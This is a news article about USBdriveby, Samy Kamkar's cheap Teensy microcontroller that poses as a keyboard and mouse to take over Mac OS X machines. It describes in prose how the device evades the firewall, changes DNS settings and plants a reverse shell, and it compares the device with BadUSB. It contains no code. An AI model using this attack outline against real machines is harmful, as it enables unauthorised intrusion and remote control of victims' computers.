USBDriveby : Using $20 Teensy 3.1 USB to hijack the Mac OS X PC

$20 Micro Controller can Hijack Computers by Emulating Mouse and Keyboard #USBDriveby

Samy Kamkar, a security researcher has found a security loophole in something most users won’t even bother securing. He has managed to use a Teensy 3.1 USB-based micro controller available for $20, and load it with enough software to emulate a keyboard and a mouse in whichever system it is connected in. Once connected, it can be used to carry out any operation on the target computer. Mind you, this isn’t a hack, its just taking advantage of a utility that we take for granted.

Blind Faith

The gadget, dubbed USBdriveby by Kamkar, leverages the fact that many systems blindly trust USB devices connected to them. Once the USB drive is connected to a machine, it can be used to disable firewalls, download malware, change DNS settings or even to the extent of creating a backdoor onto the system. And once the device has been disconnected from the system, the victim machine can be used under attackers command and control. And since both the input devices (keyboard and mouse) were emulated, there is no way for the victim, however security conscious, gets to know how his machine got infected.

“When you normally plug in a mouse or keyboard into a machine, no authorization is required to begin using them,” the researcher explained. “The devices can simply begin typing and clicking. We exploit this fact by sending arbitrary keystrokes meant to launch specific applications (via Spotlight / Alfred / Quicksilver), permanently evade a local firewall (Little Snitch), install a reverse shell in crontab, and even modify DNS settings without any additional permissions.”

Systems vulnerable

Kamkar has carried out his research on Mac OS X and found that he could emulate either the mouse or the keyboard and get the system to do what he wished.  Kamkar says that if the emulator works on Mac OS X, it should work on both Windows and Linux easily, given the resources Apple puts into securing Mac OS X. The source code for the microcontroller and the various operations performed by USBdriveby has been made available and can be download from Github here. These types of attacks are not new, and there is reason to believe that the NSA has already been using such devices as backdoors.

Previous USB Hacks

Earlier this year, at the Black Hat security conference, researchers at Germany-based SRLabs demonstrated that a USB device’s firmware can be reprogrammed for malicious purposes. They called the attack “BadUSB.” The method developed was much more sophisticated compared to USBdriveby. However, they did not release the source code until September. USBdriveby however, is a completely different approach as it only emulates hardware, leaving the actual hacking upto the individual.

LEAVE A REPLY

Please enter your comment!
Please enter your name here